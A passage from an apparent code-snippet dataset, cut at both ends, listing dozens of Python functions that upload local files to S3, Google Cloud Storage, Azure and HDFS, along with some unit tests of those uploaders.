relative_path, file_path, filename):\n try:\n key = os.path.join(s3_uploader[\"key_prefix\"], relative_path, filename)\n s3_uploader[\"transfer\"].upload_file(file_path, s3_uploader[\"bucket\"], key)\n except FileNotFoundError: # noqa ignore=F821\n # Broken link or deleted\n pass\n except Exception: # pylint: disable=broad-except\n logger.exception(\"Failed to upload file to s3.\")\n finally:\n # delete the original file\n if os.path.exists(file_path):\n os.remove(file_path)", "def transfer_files_to_s3(self, input_path, bucket_name, file_ext):\n client = boto3.client('s3', aws_access_key_id=self.access_key,\n aws_secret_access_key=self.secret_key)\n transfer = S3Transfer(client)\n for subdir, dirs, files in os.walk(input_path):\n for file in files:\n file_name, file_extension = os.path.splitext(file)\n full_path = os.path.join(subdir, file)\n if file_extension == '.' + file_ext:\n logging.info(\"transferring file {}\".format(file_name))\n transfer.upload_file(full_path, bucket_name, file_ext\n + '/' + file)", "def _upload_file(file_name, bucket, object_name):\n\n # If S3 object_name was not specified, use file_name\n if object_name is None:\n object_name = file_name\n\n # Upload the file\n try:\n s3.upload_file(file_name, bucket, object_name)\n except ClientError as e:\n logging.error(e)\n return False\n return True", "def upload(self, path, key, extra_args={}):\n if key.endswith(\"/\"):\n key += os.path.basename(path)\n if key.startswith(\"/\"):\n key = key[1:]\n remote_path = self.base.full_cell + \"/\" + key\n self.s3.meta.client.upload_file(path, self.bucket, remote_path, ExtraArgs=extra_args)\n print \"UPLOADED {} to s3://{}/{}\".format(path, self.bucket, remote_path)", "def upload_file_s3(file_name, bucket):\n\n # If S3 object_name was not specified, use file_name \n try:\n response = s3_client.upload_file(file_name,\n bucket, \n file_name.replace('../',''))\n print(\"Uploaded \" + file_name)\n except ClientError as e:\n print(\"Failed to upload \" + file_name)\n logging.error(e)\n return False\n return True", "def upload(jsonfiles):\n # clear S3 Bucket\n bucket = S3Bucket()\n bucket.clear()\n for jsonfile in jsonfiles:\n filename = os.path.basename(jsonfile)\n key = build_key(filename)\n logging.info(\"%s %s\", filename, key)\n # store json in S3 object\n bucket.store(key, jsonfile)", "def upload_file_to_s3(file, user_id, type_data, name):\n b = boto_init_s3(\"yapster\")\n path_bucket = \"\"\n if b:\n if type_data == \"cover\":\n path_bucket = \"yapsterusers/uid/\" + user_id + \"/cover/cover\"\n\n if type_data == \"profile\":\n path_bucket = \"yapsterusers/uid/\" + user_id + \"/profile/profile\"\n\n if type_data == \"yap_audio\":\n path_bucket = \"yapsterusers/uid/\" + user_id + \"/yaps/1/audio/\" + name\n\n if type_data == \"yap_image\":\n path_bucket = \"yapsterusers/uid/\" + user_id + \"/yaps/1/image/\" + name\n\n if type_data == \"original\":\n path_bucket = \"yapsterusers/uid/\" + user_id + \"/yaps/1/audio/original\"\n\n k = b.get_key(path_bucket)\n if not k:\n try:\n k = b.new_key(path_bucket)\n except:\n return \"error occured\"\n k.set_contents_from_file(file)\n\n return path_bucket", "def upload_file(bucket, local_file_path, remote_destination_path):\n bucket = get_bucket(bucket)\n k = Key(bucket)\n k.key = remote_destination_path\n k.set_contents_from_filename(local_file_path)", "def test_upload_directory_to_s3_bucket(self):\n conn = boto3.resource('s3', region_name='us-east-1')\n # We need to create the bucket since this is all in Moto's 'virtual' AWS account\n conn.create_bucket(Bucket='foobucket')\n\n s3_connector = S3Connector()\n s3_connector.connect(\"default\")\n s3_connector.upload_directory(directory_path=\"test/test_resources/test_directory\",\n bucket_name=\"foobucket\", aws_directory=\"test_directory\")\n\n # get bucket contents\n response = boto3.client('s3').list_objects(Bucket=\"foobucket\")\n contents = []\n for content in response.get('Contents', []):\n contents.append(content.get('Key'))\n\n self.assertEqual(\n contents, [\"test_directory/test_file\", \"test_directory/test_file2\"])", "def upload_object(self, file_path, destination, use_original_name=True, ExtraArgs=None):\n assert os.path.exists(file_path), \"File path does not exist {}\".format(file_path)\n bucket_name, save_path = self.split_name(destination)\n if use_original_name:\n save_path = os.path.join(save_path, os.path.basename(file_path))\n\n self.s3_client.upload_file(file_path, bucket_name, save_path, ExtraArgs=ExtraArgs)\n return os.path.join(bucket_name, save_path)", "def upload_to_s3(s3_path, local_path):\n # Connect to s3 using aws access key\n try:\n s3 = boto3.client('s3',\n aws_access_key_id=os.environ.get(\"AWS_ACCESS_KEY_ID\"),\n aws_secret_access_key=os.environ.get(\"AWS_SECRET_ACCESS_KEY\"))\n logger.info(\"AWS S3 Connected.\")\n except botocore.exceptions.PartialCredentialsError:\n logger.error(\"AWS Credentials Invalid.\")\n\n # Upload all raw pictures under the local path to s3\n bucket_name, s3_store_path = _parse_s3(s3_path)\n if len(list(os.walk(local_path))) > 0:\n for root, dirs, files in os.walk(local_path):\n for file in files:\n s3.upload_file(os.path.join(root, file), bucket_name, os.path.join(s3_store_path, file))\n logger.info(\"{} Uploaded.\".format(file)) # log progress\n\n # If a single file path submitted, upload the single file\n else:\n filename = local_path.split('/')[-1]\n s3.upload_file(local_path, bucket_name, os.path.join(s3_store_path, filename))\n logger.info(\"{} Uploaded.\".format(filename)) # log progress\n\n logger.info(\"All Image Uploaded to S3.\")", "def transfer(self):\n\n # Upload unverified matches to s3 bucket if unverified argument used (production only)\n if self.in_args.unverified:\n files = glob.glob(os.path.join(self.directories['unverified_matches_dir'].format(self.region_dir, self.proc_type), '*'))\n\n # Loop through files found in unverified_matches folder\n for filepath in files:\n filename = os.path.basename(filepath)\n # Upload each file to S3 bucket folder\n self.upload_file(filepath, self.bucket, 'UK_suppliers/Unverified_Matches/' + filename)\n self.unverified_file = filename\n\n # Zip file creation - note will only work for latest unverified file. Above loop is added just incase\n # any residual files get added manually to S3 bucket.\n\n # Get filepaths of stats file, filtered and excluded matches files\n stats_fp = self.directories['stats_file'].format(self.region_dir, self.proc_type)\n filtered_matches_fp = self.directories['filtered_matches'].format(self.region_dir, self.proc_type) + '_' + \\\n str(self.best_config) + '.csv'\n\n excluded_matches_fp = self.directories['excluded_matches'].format(self.region_dir, self.proc_type) + '_' + \\\n str(self.best_config) + '.csv'\n\n blacklisted_strings_fp = self.directories['blacklisted_string_matches'].format(self.region_dir)\n\n stats_file_fp = self.directories['script_performance_stats_file'].format(self.region_dir, self.proc_type)\n\n # Assign zip file which will contain above files\n files_zip = self.unverified_file[:10] + \"_files.zip\"\n\n with ZipFile(files_zip, 'w') as myzip:\n myzip.write(stats_fp, os.path.basename(stats_fp))\n myzip.write(filtered_matches_fp,os.path.basename(filtered_matches_fp))\n myzip.write(excluded_matches_fp, os.path.basename(excluded_matches_fp))\n myzip.write(blacklisted_strings_fp, os.path.basename(blacklisted_strings_fp))\n myzip.write(stats_file_fp, os.path.basename(stats_file_fp))\n\n self.upload_file(files_zip, self.bucket, 'UK_suppliers/Archive/' + files_zip)\n\n # Download verified matches from s3 bucket if verified argument (production only)\n if self.in_args.verified:\n self.process_verified_files()\n\n # Add confirmed matches/non-matches to training file\n if self.in_args.convert_training:\n self.runfile_mods.convert_training.ConvertToTraining.convert(self)", "def upload_to_bucket(bucket_name, path_to_source_file, upload_file_name):\r\n\r\n try:\r\n # initialize client & get blob\r\n _, _, blob = create_client(bucket_name, upload_file_name)\r\n\r\n # set the path to source file\r\n blob.upload_from_filename(path_to_source_file)\r\n \r\n except Exception as err:\r\n raise err\r\n sys.exit(1)\r\n \r\n else:\r\n print(f\"upload file '{path_to_source_file}' succeed\")\r\n\r\n return None", "def uploadFilestoS3(self):\n allfilesuploadedcount = 0\n for eachfiledic in self.fileTobeUploaded:\n if eachfiledic[\"uploadedSuccess\"] == 0: #Means this file never got uploaded.\n if os.path.getsize(eachfiledic[\"filepath\"]) < 1000000000: #<1GB\n s3Log.info (\"FileSize < 1GB for :{}, so using single part upload.\".format(eachfiledic[\"filepath\"]) )\n if self.singlePartUpload(eachfiledic) == True:\n eachfiledic[\"uploadedSuccess\"] = 1\n allfilesuploadedcount = allfilesuploadedcount + 1\n else:\n s3Log.info (\"FileSize > 1GB for :{}, so using Multi Part upload. \\n\".format(eachfiledic[\"filepath\"]) )\n if self.multiPartUpload(eachfiledic) == True:\n eachfiledic[\"uploadedSuccess\"] = 1\n allfilesuploadedcount = allfilesuploadedcount + 1\n\n\n elif eachfiledic[\"uploadedSuccess\"] == 1: #Means it got uploaded in the last run.\n allfilesuploadedcount = allfilesuploadedcount + 1\n\n self.saveStateOfThisRun()\n if len(self.fileTobeUploaded) == allfilesuploadedcount: #Means we uploaded all files in the queue\n return True\n else:\n return False", "def _s3_intermediate_upload(file_obj, file_name, fields, session, callback_url):\n import boto3\n from boto3.s3.transfer import TransferConfig\n from boto3.exceptions import S3UploadFailedError\n\n # actually do the upload\n client = boto3.client(\n \"s3\",\n aws_access_key_id=fields[\"upload_aws_access_key_id\"],\n aws_secret_access_key=fields[\"upload_aws_secret_access_key\"],\n )\n\n multipart_chunksize = _choose_boto3_chunksize(file_obj)\n\n # if boto uses threads, ctrl+c won't work\n config = TransferConfig(use_threads=False, multipart_chunksize=multipart_chunksize)\n\n # let boto3 update our progressbar rather than our FASTX wrappers, if applicable\n boto_kwargs = {}\n\n if hasattr(file_obj, \"progressbar\"):\n boto_kwargs[\"Callback\"] = file_obj.progressbar.update\n file_obj._progressbar = file_obj.progressbar\n file_obj.progressbar = None\n\n for attempt in range(1, 4):\n try:\n client.upload_fileobj(\n file_obj,\n fields[\"s3_bucket\"],\n fields[\"file_id\"],\n ExtraArgs={\"ServerSideEncryption\": \"AES256\"},\n Config=config,\n **boto_kwargs\n )\n break\n except S3UploadFailedError as e:\n logging.debug(\"Caught S3UploadFailedError on attempt {}/3: {}\".format(attempt, str(e)))\n logging.error(\n \"{}: Connectivity issue, retrying upload via intermediary ({}/3)...\".format(\n file_name, attempt\n )\n )\n\n # rewind the progressbar if possible, then remove so boto3 can update the bar directly\n if hasattr(file_obj, \"_progressbar\"):\n file_obj.progressbar = file_obj._progressbar\n file_obj.seek(0)\n file_obj.progressbar = None\n else:\n file_obj.seek(0)\n else:\n logging.debug(\"{}: exhausted all retries via intermediary\")\n raise_connectivity_error(file_name)\n\n # issue a callback\n try:\n resp = session.post(\n callback_url,\n json={\n \"s3_path\": \"s3://{}/{}\".format(fields[\"s3_bucket\"], fields[\"file_id\"]),\n \"filename\": file_name,\n \"import_as_document\": fields.get(\"import_as_document\", False),\n },\n )\n except requests.exceptions.ConnectionError:\n raise_connectivity_error(file_name)\n\n if resp.status_code != 200:\n raise_connectivity_error(file_name)\n\n try:\n return resp.json()\n except ValueError:\n return {}", "def pushToS3()-> None:\n logging.info(f\"Connecting to s3 {getTime()}\")\n s3 = boto3.client(\"s3\",endpoint_url=\"http://localhost:4566\")\n if(not s3.head_bucket(Bucket=\"demo\")):\n s3.create_bucket(Bucket='demo')\n try:\n logging.info(f\"Uploading to s3 {getTime()}\")\n s3.upload_file(\"result.csv\",\"demo\",\"result.csv\")\n logging.info(f\"Finished uploding to s3 {getTime()}\")\n except ClientError as e:\n logging.error(f\"Error uploading file to S3 {getTime()}\")", "def upload_s3_file(key, bucket, filename):\n s3_client = boto3.client('s3')\n s3_client.upload_file(filename, bucket, key)\n return True", "def _upload_blob(self, source_file_path):\n\n if os.path.exists(source_file_path) and os.path.isfile(source_file_path):\n destination_blob_name = os.path.basename(source_file_path)\n\n bucket = self._storage_client.bucket(self._bucket_name)\n blob = bucket.blob(destination_blob_name)\n\n blob.upload_from_filename(source_file_path)\n\n print(f'File {destination_blob_name} uploaded to {blob.path}')\n else:\n error_message = f'{source_file_path} does not exist.'\n raise FileNotFoundError(error_message)", "def upload_file(conn, filename_local, filename_s3, gzip=False):\n\n filename_s3 = filename_s3.lstrip('./')\n\n file_descriptor = open(filename_local, 'rb')\n content = file_descriptor.read()\n\n content_type = _get_content_type(file_descriptor)\n headers = _get_headers(content_type)\n\n #should compress if the file is compressable and gzip is enabled\n can_be_gzipped = _file_can_be_compressed(filename_local)\n if gzip and can_be_gzipped:\n content = _compress_string(content)\n headers['Content-Length'] = str(len(content))\n headers['Content-Encoding'] = 'gzip'\n extension = mimetypes.guess_extension(content_type)\n #we should not overwrite the original file in the server.\n #We change extensions: style.css --> style.gz.css, for instance\n filename_s3 = filename_s3.rstrip(extension) + '.gz' + extension\n\n #if gzip is enabled and it is not compressable, don't upload nothing at all\n elif gzip and not can_be_gzipped:\n return\n\n #upload\n print 'Uploading %s to %s' % (filename_local, filename_s3)\n _put(conn, filename_s3, content, headers=headers)\n file_descriptor.close()", "def upload_to_s3(file_name, bucket, key): \n s3 = boto3.resource('s3') \n try:\n s3.meta.client.upload_file(file_name, bucket, key)\n print(\"s3 upload success -- uploaded \" + file_name + \" to the bucket: \" + bucket)\n except ClientError as e:\n logging.error(e)\n return False\n print(\"s3 upload error occurs\", e)\n return True", "def upload_file(file_name, object_name=None, bucket = BUCKET_NAME):\n\n # Upload the file\n s3_client = boto3.client('s3')\n try:\n response = s3_client.upload_file(file_name, bucket, object_name) if type(file_name) == str else s3_client.upload_fileobj(file_name, BUCKET_NAME, object_name)\n except ClientError as e:\n logging.error(e)\n return False\n return True", "def upload(self, file_path, bucket_name, file_name):\n\n self.client.upload_file(file_path, bucket_name, file_name)", "def push_file_to_s3(logger, app_config, s3_object_info, start_timing):\n import boto3\n s3_resource = boto3.resource('s3')\n logging.getLogger('boto3').addHandler(logger)\n s3_object = get_config_item(app_config, 's3_info.object_base') + \\\n '/' + s3_object_info['camera_name'] + '/' + \\\n s3_object_info['date_string'] + '/' + \\\n s3_object_info['hour_string'] + '/' + \\\n s3_object_info['img_type'] + '/' + \\\n s3_object_info['just_file']\n\n utc_ts = int(time.time() * 1000)\n\n object_metadata = {'camera': s3_object_info['camera_name'],\n 'camera_timestamp': str(utc_ts)}\n s3_resource.Object(get_config_item(app_config, 's3_info.bucket_name'),\n s3_object).put(Body=open(s3_object_info['file_name'], 'rb'),\n Metadata=object_metadata)\n totaltime = time.time() - start_timing\n logger.info(\"S3 Object: {} written to s3 in {} seconds.\".format(s3_object, totaltime))\n return utc_ts", "def _copy_local_to_s3(src: str, dest_bucket: str, dest_key: str)->bool:\n s3_client = boto3.client('s3')\n try:\n response = s3_client.upload_file(src, dest_bucket, dest_key)\n except Exception as exc:\n raise Error(\"Error {} occurred while working on local object to s3.\".format(exc))\n \n return True", "def aws_s3_upload(self):\n\n # absolute path to the csv file to create\n csv_file = os.path.join(self.csvfile, \"DLTINS_20210117_01of01.csv\")\n\n # Test for correct data\n self.assertTrue(\n aws_s3_upload(\n csv_file,\n self.region_name,\n self.aws_access_key_id,\n self.aws_secret_access_key,\n self.bucket_name,\n )\n )\n\n # Test for non existent bucket\n self.assertFalse(\n aws_s3_upload(\n csv_file,\n \"useast\",\n self.aws_access_key_id,\n self.aws_secret_access_key,\n self.bucket_name,\n )\n )\n\n # Test for non existent region\n self.assertFalse(\n aws_s3_upload(\n csv_file,\n self.region_name,\n self.aws_access_key_id,\n self.aws_secret_access_key,\n \"nonexistentbucketname\",\n )\n )\n\n # Test for incorrect keys\n self.assertFalse(\n aws_s3_upload(\n csv_file,\n self.region_name,\n \"xjvachiahvlchabo;jvbo\",\n \"khkc vah haaih aih ika\",\n self.bucket_name,\n )\n )", "def upload_to_storage_client(self, **kwargs):\n if 'source_path' in kwargs:\n source_path = kwargs.get('source_path')\n else:\n raise ValueError(\"Must provide the \\'source_path\\' parameter for local storage client to find the file!\")\n\n if 'destination_path' in kwargs:\n destination_path = kwargs.get('destination_path')\n else:\n raise ValueError(\n \"Must provide the \\'destination_path\\' parameter for local storage client to find the destination!\")\n\n compression = kwargs.get('compression')\n intended_stored_file_name = kwargs.get('intended_stored_file_name', None)\n\n if not os.path.isdir(source_path) and compression:\n raise ValueError(\"Only directories can be zipped. Single files cannot be zipped.\")\n\n self.__check_dir(destination_path)\n\n upload_parameters = {'source_path': source_path, 'compression': compression,\n 'destination_path': destination_path}\n\n if compression:\n # TODO\n # if no name is supplied, name of the zipfile will be the destination; currently funky at move() due to source =/= location\n if not intended_stored_file_name:\n file_name = os.path.split(source_path)[-1]\n intended_stored_file_name = 'archive_' + file_name + \"_\" + datetime.now().strftime(\"%A_%d_%B_%Y_%I_%M%p\")\n upload_parameters['intended_stored_file_name'] = intended_stored_file_name\n\n # compression can only happen on DIRECTORIES, and not on single files\n # compress2 takes a name from the kwargs, and source from parameter of save_local\n compress(intended_stored_file_name, source_path)\n\n # TODO: Perhaps zipfile dumping location can be found by getting a parent/ child from source\n\n # To find where compress2 dumps zipfile, currently: working directory path\n location = self.__prj_root_dir + \"\\\\\" + intended_stored_file_name + \".zip\"\n shutil.move(location, destination_path)\n\n upload_parameters['intended_stored_file_name'] = intended_stored_file_name\n upload_parameters['upload_date_time'] = datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")\n self.generate_json_upload_parameters(**upload_parameters)\n else:\n upload_parameters['intended_stored_file_name'] = intended_stored_file_name\n upload_parameters['upload_date_time'] = datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")\n shutil.move(source_path, destination_path)\n self.generate_json_upload_parameters(**upload_parameters)", "def _upload(self, errors):\n if self.backup_bucket is None:\n return\n\n try:\n with open(\"%s/%s.tar.gz\"%(self.backup_path, self.name), 'r+') as f:\n s3upload.upload_to_s3(f,\n self.backup_bucket,\n \"%s/%s.tar.gz\"%(self.backup_id, self.name))\n\n # Cleaning up resources, since the upload was successful\n run(\"rm -f %s/%s.tar.gz\"%(self.backup_path, self.name))\n except Exception as e:\n logging.exception(e)\n errors.put(Exception(\"Error uploading %s server backup to S3\" % self.name))\n traceback.print_exc()", "def _upload_dir_to_bucket(self, path, ext_path):\n for file in os.listdir(path):\n self._upload_to_bucket(path+'/'+file, ext_path+'/'+file)", "def upload(conn, localpath, remotepath, filter = None, ignore_invalid = False, chunk_size = 16000):\n if os.path.isdir(localpath):\n upload_dir(conn, localpath, remotepath, filter, chunk_size)\n elif os.path.isfile(localpath):\n upload_file(conn, localpath, remotepath, chunk_size)\n else:\n if not ignore_invalid:\n raise ValueError(\"cannot upload %r\" % (localpath,))", "def _upload_file_to_aws(aws_upload_details):\n # Step 1: get the request signed\n sig_uri = aws_upload_details['signature']\n\n now = dt.datetime.utcnow()\n expires = now + dt.timedelta(hours=1)\n now_ts = timegm(now.timetuple())\n key = 'data_imports/%s.%s' % (filename, now_ts)\n\n payload = {}\n payload['expiration'] = expires.isoformat() + 'Z'\n payload['conditions'] = [\n {'bucket': aws_upload_details['aws_bucket_name']},\n {'Content-Type': 'text/csv'},\n {'acl': 'private'},\n {'success_action_status': '200'},\n {'key': key}\n ]\n\n sig_result = requests.post(main_url + sig_uri,\n headers=upload_header,\n data=json.dumps(payload))\n if sig_result.status_code != 200:\n msg = \"Something went wrong with signing document.\"\n raise RuntimeError(msg)\n else:\n sig_result = sig_result.json()\n\n # Step 2: upload the file to S3\n upload_url = \"http://%s.s3.amazonaws.com/\" % (aws_upload_details['aws_bucket_name'])\n\n # s3 expects multipart form encoding with files at the end, so this\n # payload needs to be a list of tuples; the requests library will encode\n # it property if sent as the 'files' parameter.\n s3_payload = [\n ('key', key),\n ('AWSAccessKeyId', aws_upload_details['aws_client_key']),\n ('Content-Type', 'text/csv'),\n ('success_action_status', '200'),\n ('acl', 'private'),\n ('policy', sig_result['policy']),\n ('signature', sig_result['signature']),\n ('file', (filename, open(upload_filepath, 'rb')))\n ]\n\n result = requests.post(upload_url,\n files=s3_payload)\n\n if result.status_code != 200:\n msg = \"Something went wrong with the S3 upload: %s \" % result.reason\n raise RuntimeError(msg)\n\n # Step 3: Notify SEED about the upload\n completion_uri = aws_upload_details['upload_complete']\n completion_payload = {\n 'import_record': upload_dataset_id,\n 'key': key,\n 'source_type': upload_datatype\n }\n return requests.post(main_url + completion_uri,\n headers=upload_header,\n data=completion_payload)", "def upload_file(file_name, bucket, object_name='patients.log'):\n # If S3 object_name was not specified, use file_name\n if object_name is None:\n object_name = file_name\n # Upload the file\n s3_client = boto3.client('s3')\n try:\n response = s3_client.upload_file(file_name, bucket, object_name)\n except ClientError as e:\n logging.error(e)\n return False\n return True", "def preprocess(event, context):\n # create file in DDB\n file_id = utils.generate_id()\n file_request = json.loads(event.get('body'))\n FileModel.create({\n 'id': file_id,\n 'name': file_request.get('name')\n })\n LOGGER.debug('Files item created. service=ddb method=put_item id={}'.format(file_id))\n # generate signed URL for posting file\n url = S3_CLIENT.generate_presigned_url(\n ClientMethod='put_object',\n Params={\n 'Bucket': runtime_context.BUCKET_NAME,\n 'Key': file_id\n },\n ExpiresIn=runtime_context.EXPIRATION\n )\n LOGGER.debug('Presigned URL generated. service=s3 method=put_object id={}'.format(file_id))\n # send back the signed url\n return {\n \"statusCode\": 200,\n \"body\": json.dumps({\n 'id': file_id,\n 'url': url\n }),\n # CORS header\n \"headers\": {\n \"Access-Control-Allow-Origin\": \"*\"\n }\n }", "def upload_file(file_name, bucket):\r\n object_name = file_name\r\n s3_client = boto3.client('s3')\r\n response = s3_client.upload_file(file_name, bucket, object_name)\r\n\r\n return response", "def upload_file(self, source, dest):\n print(f\"Uploading {source} to {dest}\")\n with open(source, \"rb\") as data:\n self.client.upload_blob(name=dest, data=data)", "def main():\n arg_parser = argparse.ArgumentParser(description='Transfer data files to AWS S3 bucket.')\n arg_parser.add_argument('mission', action='store', help='Mission data to be transferred.')\n arg_parser.add_argument('target', action='store', help='Which AWS account to receive data.')\n args = arg_parser.parse_args()\n mission = args.mission\n target = args.target.upper()\n\n config = configparser.ConfigParser()\n config.read('aws.ini')\n bucket = config[target]['bucket']\n access_key_id = config[target]['access_key']\n secret_key_id = config[target]['secret_key']\n\n source_dir = os.path.join(OUTBOUND, mission)\n dir_list = get_target_list(source_dir)\n for directory in dir_list:\n if directory.endswith('_TIF'):\n file_dir = os.path.join(source_dir, directory)\n files = get_target_list(file_dir)\n for file in files:\n upload_to_aws(file_dir + file, bucket, mission + f'/{directory}/{file}',\n access_key_id, secret_key_id)", "def _cloud_storage_upload(local_file, bucket, filename_on_bucket):\n client = storage.Client()\n\n bucket = client.get_bucket(bucket)\n blob = bucket.blob(filename_on_bucket)\n blob.upload_from_filename(local_file)\n print('uploaded ', bucket, filename_on_bucket)", "def post(self):\n services.file.move_files(**request.json)\n return {\n \"status\": True\n }", "def upload_file(\n self, bucket_id: uplink.Path, filename: uplink.Path, file: uplink.Body\n ):\n pass", "def upload(bucket_name, source_file, destination_blob_name):\n storage_client = storage.Client()\n bucket = storage_client.get_bucket(bucket_name)\n blob = bucket.blob(destination_blob_name)\n\n try:\n blob.upload_from_file(source_file)\n except:\n return None\n else:\n return('File {} uploaded to {}.'.format(\n source_file,\n destination_blob_name))", "def upload_file(Filename=None, Bucket=None, Key=None, ExtraArgs=None, Callback=None, Config=None):\n pass", "def upload_object(object_location: ObjectLocation, stream: io.BytesIO) -> None:\n s3 = boto3.client(\"s3\")\n result = s3.upload_fileobj(stream, object_location.bucket.name, object_location.key)\n log.debug(f\"Result of upload to {object_location}: {result}\")", "def upload_file(command):\n if 'action' not in command or command['action']!=\"UPLOAD\":\n raise ValueError(\"Command not of type UPLOAD\")\n if 'file_pattern' not in command: \n raise ValueError(\"Missing file pattern\")\n path = command['file_pattern'] \n if not os.path.exists(path):\n raise ValueError(\"No valid file for upload found\")\n returner={}\n handler = Layer1(aws_access_key_id = command['access_key'],aws_secret_access_key = command['secret_access_key'],region_name=command['region_name'])\n uploader = ConcurrentUploader(handler,command['vault_name'],part_size=uchunk)\n file_size = os.path.getsize(path)\n if file_size==0:\n raise ValueError(\"File is empty. Nothing to upload.\")\n csum = chunkedmd5(path)\n itime=time.time()\n file_name = os.path.basename(path)\n machine_id = str(command['target']) if client_name == '' else client_name+' ('+str(command['target']) + ')'\n #Construct a meaningful description object for the file\n #The limits are that the description can be no more than 1024 characters in length and must use only ascii characters between 32 and 126 (i.e., 32<=ord(char)<=126)\n dscrip = command['description']+'\\\\n'\n dscrip = dscrip + \"Uploaded at \"+str(itime)+'\\\\n'+ \"Full path \"+str(path)+'\\\\n'+ \"File size \"+str(file_size)+'\\\\n' + \"MD5 \"+str(csum)+'\\\\n' + \"Source machine id \"+machine_id+'\\\\n'\n print \"Uploading file %s\"%file_name\n #Put some validation stuff here...\n #Do the upload\n archive_id = uploader.upload(path,dscrip)\n print \"Completed successfully. Archive ID: %s\"%archive_id\n #Done the upload, send the bastard back\n returner['archive_id'] = archive_id\n returner['description'] = dscrip\n returner['file_name'] = file_name\n returner['true_path'] = path\n returner['file_size'] = file_size\n returner['md5sum'] = csum\n returner['insert_time']=int(itime)\n returner['region_name']=command['region_name']\n returner['vault_name'] = command['vault_name']\n return returner", "def upload_file(file_name: str, bucket: str, object_name: str =None) -> None:\n\n # If S3 object_name was not specified, use file_name\n if object_name is None:\n object_name = file_name\n\n # Upload the file\n s3_client = boto3.client(\"s3\")\n try:\n s3_client.upload_file(file_name, bucket, object_name)\n except ClientError as e:\n logging.error(e)", "def upload_file_by_url(s3_file_name, filename):\n full_path = os.path.join(CONFIG_BROKER['path'], \"tests\", \"integration\", \"data\", filename)\n\n if CONFIG_BROKER['local']:\n # If not using AWS, put file submission in location\n # specified by the config file\n broker_file_path = CONFIG_BROKER['broker_files']\n copy(full_path, broker_file_path)\n submitted_file = os.path.join(broker_file_path, filename)\n return {'bytesWritten': os.path.getsize(submitted_file), 's3FileName': full_path}\n else:\n # Use boto to put files on S3\n s3conn = boto.s3.connect_to_region(CONFIG_BROKER[\"aws_region\"])\n bucket_name = CONFIG_BROKER['aws_bucket']\n key = Key(s3conn.get_bucket(bucket_name))\n key.key = s3_file_name\n bytes_written = key.set_contents_from_filename(full_path)\n return {'bytesWritten': bytes_written, 's3FileName': s3_file_name}", "def upload(args):\n osf = _setup_osf(args)\n if osf.username is None or osf.password is None:\n sys.exit('To upload a file you need to provide a username and'\n ' password.')\n\n project = osf.project(args.project)\n storage, remote_path = split_storage(args.destination)\n if remote_path == '':\n remote_path = os.path.split(args.source)[-1]\n\n store = project.storage(storage)\n if args.recursive:\n if not os.path.isdir(args.source):\n raise RuntimeError(\"Expected source ({}) to be a directory when \"\n \"using recursive mode.\".format(args.source))\n\n # local name of the directory that is being uploaded\n _, dir_name = os.path.split(args.source)\n\n for root, _, files in os.walk(args.source):\n subdir_path = os.path.relpath(root, args.source)\n for fname in files:\n local_path = os.path.join(root, fname)\n with open(local_path, 'rb') as fp:\n # build the remote path + fname\n name = os.path.join(remote_path, dir_name, subdir_path,\n fname)\n store.create_file(name, fp, force=args.force,\n update=args.update)\n\n else:\n with open(args.source, 'rb') as fp:\n store.create_file(remote_path, fp, force=args.force,\n update=args.update)", "def upload_blob(bucket_name, source_file_name, destination_blob_name):\n bucket_name = \"teststorechakra\"\n source_file_name = \"/Users/demo/Documents/learn/gcp/Setting_gcp_datalabs.sh\"\n destination_blob_name = \"testcloud sdk\"\n\n storage_client = storage.Client()\n bucket = storage_client.bucket(bucket_name)\n blob = bucket.blob(destination_blob_name)\n\n blob.upload_from_filename(source_file_name)\n\n print(\n \"File {} uploaded to {}.\".format(\n source_file_name, destination_blob_name\n )\n )", "def upload(\n bucket: str, key: str, filename: str, session: Optional[boto3.Session] = None\n) -> None:\n s3_client = _get_client(session)\n LOGGER.info(\"uploading %s to s3://%s/%s...\", filename, bucket, key)\n s3_client.upload_file(Filename=filename, Bucket=bucket, Key=key)", "def upload_file_to_s3(self, file_data):\r\n\r\n file_key = file_data.name + datetime.now(UTC).strftime(\r\n xqueue_interface.dateformat\r\n )\r\n\r\n file_data.seek(0)\r\n s3_public_url = upload_to_s3(\r\n file_data, file_key, self.s3_interface\r\n )\r\n\r\n return s3_public_url", "def upload_from_path_to_s3(file_path):\n bucket_name = \"alp-reports-lambda\"\n environment = \"dev\" if os.environ.get('LOCAL') else \"prod\"\n object_key = f\"{environment}/835/{file_path.split('/')[-1]}\"\n\n s3 = boto3.resource('s3')\n s3.Object(bucket_name, object_key).upload_file(file_path, ExtraArgs={'ACL': 'public-read'})\n\n return f\"https://s3.amazonaws.com/{bucket_name}/{object_key}\"", "def _upload(\n self,\n client: demisto_client,\n marketplace: MarketplaceVersions,\n ) -> None:\n try:\n upload_method = self._client_upload_method(client=client)\n except NotImplementedError as e:\n raise NotImplementedError(\n f\"missing overriding upload method for {self.content_type}\"\n ) from e\n\n with TemporaryDirectory() as f:\n dir_path = Path(f)\n self.dump(\n dir_path,\n marketplace=marketplace,\n )\n response = upload_method(dir_path / self.normalize_name)\n parse_upload_response(\n response, path=self.path, content_type=self.content_type\n ) # raises on error", "async def upload_file(\n location_id: LocationID,\n file_id: StorageFileID,\n file_size: ByteSize | None,\n link_type: LinkType = LinkType.PRESIGNED,\n is_directory: bool = False,\n):", "def upload_blob(bucket_name, source_file_name, destination_blob_name):\r\n bucket_name = \"my-photos\"\r\n source_file_name = \"./puppy.png\"\r\n estination_blob_name = \"puppy01\"\r\n\r\n storage_client = storage.Client()\r\n bucket = storage_client.bucket(bucket_name)\r\n blob = bucket.blob(destination_blob_name)\r\n\r\n blob.upload_from_filename(source_file_name)\r\n\r\n print(\r\n \"File {} uploaded to {}.\".format(\r\n source_file_name, destination_blob_name\r\n )\r\n )", "def upload_file(self, source, destination, overwrite=True, parallelism=1,\n **kwargs):\n c = self.get_conn()\n c.upload(hdfs_path=destination,\n local_path=source,\n overwrite=overwrite,\n n_threads=parallelism,\n progress=self.progress,\n **kwargs)\n logging.debug(\"Uploaded file {} to {}\".format(source, destination))", "def upload_blob(source_file_name, destination_blob_name, is_redact=False):\n # source_file_name = \"local/path/to/file\"\n # destination_blob_name = \"storage-object-name\"\n\n storage_client = storage.Client()\n \n # storage the file in the right bucket\n bucket_name = PUBLIC_BUCKET if is_redact else PRIVATE_BUCKET\n bucket = storage_client.bucket(bucket_name)\n blob = bucket.blob(destination_blob_name)\n blob.upload_from_filename(source_file_name)", "def upload_blob(bucket_name, 